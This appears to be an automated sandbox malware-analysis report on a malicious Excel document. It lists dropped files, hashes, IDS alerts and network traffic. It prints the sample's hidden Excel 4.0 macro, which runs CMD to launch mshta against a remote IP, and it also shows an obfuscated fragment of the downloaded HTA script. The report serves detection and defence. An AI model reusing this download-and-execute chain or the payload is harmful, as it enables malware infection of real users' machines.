                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11054
                                                                                                                    Entropy (8bit):6.200485074224619
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                                                                                                    MD5:DD20B97330028BCB6BF98D97C47028D9
                                                                                                                    SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                                                                                                    SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                                                                                                    SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                                                                                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

                                                                                                                    C:\Users\user\AppData\Local\Temp\476C.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFBED7E8D1868A8AC5.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):3.5189161831469296
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                                                                                                    MD5:06A30014EFAE12913C829BE85DD271EC
                                                                                                                    SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                                                                                                    SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                                                                                                    SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFD084F18BE955AE17.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5771325831414917
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                                                                                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                                                                                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                                                                                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                                                                                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9HHY8DPM6GW1G0VNKTXL.temp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5771325831414917
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                                                                                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                                                                                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                                                                                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                                                                                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                    C:\Users\user\Desktop\CJ68000754184.xls

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):86528
                                                                                                                    Entropy (8bit):7.100272352481004
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e30:g0k3hbdlylKsgqopeJBWhZFGkE+cMLx0
                                                                                                                    MD5:2C1128D3E74CCABAC63488793B1F9FC1
                                                                                                                    SHA1:44BEE61E3B69FA078FA3149A86EE14A6254F41AF
                                                                                                                    SHA-256:D6C0FE94AE6A74F54312237003CEF973E0874FC637312DF0E199207015D947B4
                                                                                                                    SHA-512:834D97F729ACF6F20ED523935BE80B4F94371B1E1CC1629ACFCDF2D0519217D67B2B38FFFD0383EBF8C0F6F837A044C97FA4F8C11E2F45B713132C98CCD56479
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: Joe Security
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                                                                                                    C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):548864
                                                                                                                    Entropy (8bit):6.980517956334168
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                                                                                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                                                                                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                                                                                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                                                                                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                    Entropy (8bit):7.044070003028746
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:CJ68000754184.xls
                                                                                                                    File size:87565
                                                                                                                    MD5:84edef677d286111cb0ef9d53e0d51df
                                                                                                                    SHA1:19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
                                                                                                                    SHA256:081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
                                                                                                                    SHA512:3fa012d744b2c065aaed9aa425f88f367b914dcd4f57e902cb6c96493872d12a13f7fdc4c476bf7319c36c0d555be84df8bb4594e4323cc1c51ef0853f8e59fe
                                                                                                                    SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:e4eea286a4b4bcb4

                                                                                                                    Static OLE Info

                                                                                                                    General

                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1

                                                                                                                    OLE File "CJ68000754184.xls"

                                                                                                                    Indicators
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Summary
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-27 23:41:00
                                                                                                                    Last Saved Time:2022-01-28 06:31:03
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Summary
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576

                                                                                                                    Streams

                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.324918127833
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00
                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.263079431268
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:76002
                                                                                                                    Entropy:7.62172227998
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                    Macro 4.0 Code

                                                                                                                    Name:REEEEEEEE
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    REEEEEEEE3False0Falsepost2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()
                                                                                                                    Name:REEEEEEEE
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    REEEEEEEE3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

                                                                                                                    Network Behavior

                                                                                                                    Snort IDS Alerts

                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                    01/28/22-21:18:27.714526TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.172

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:18:21.824399948 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.885463953 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.885570049 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.887382984 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.948643923 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949342966 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949457884 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949491978 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949515104 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949542046 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949568033 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949590921 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949603081 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949625015 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949637890 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949660063 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949666977 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949677944 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949698925 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949717999 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949734926 CET804916791.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:21.949753046 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949765921 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949769974 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.949784994 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:21.956779957 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:27.648180008 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:27.709604979 CET804916891.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:27.710990906 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:27.714525938 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:27.775736094 CET804916891.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:27.776531935 CET804916891.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:27.776552916 CET804916891.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:27.776639938 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:28.073252916 CET4916980192.168.2.22164.90.147.135
                                                                                                                    Jan 28, 2022 21:18:31.093900919 CET4916980192.168.2.22164.90.147.135
                                                                                                                    Jan 28, 2022 21:18:36.523542881 CET4916780192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:18:37.100416899 CET4916980192.168.2.22164.90.147.135
                                                                                                                    Jan 28, 2022 21:18:49.211739063 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.390794039 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.390885115 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.391053915 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.569916010 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579858065 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579883099 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579899073 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579916000 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579920053 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.579931974 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579947948 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579963923 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.579963923 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579981089 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.579983950 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.579996109 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.580034971 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.580095053 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.758980036 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759012938 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759037018 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759037018 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.759059906 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759083033 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.759083033 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759107113 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759114981 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.759130001 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759152889 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.759166956 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.760771990 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.760798931 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.760818958 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.760821104 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.760844946 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.760854959 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:49.760869026 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.760891914 CET8049170103.206.244.105192.168.2.22
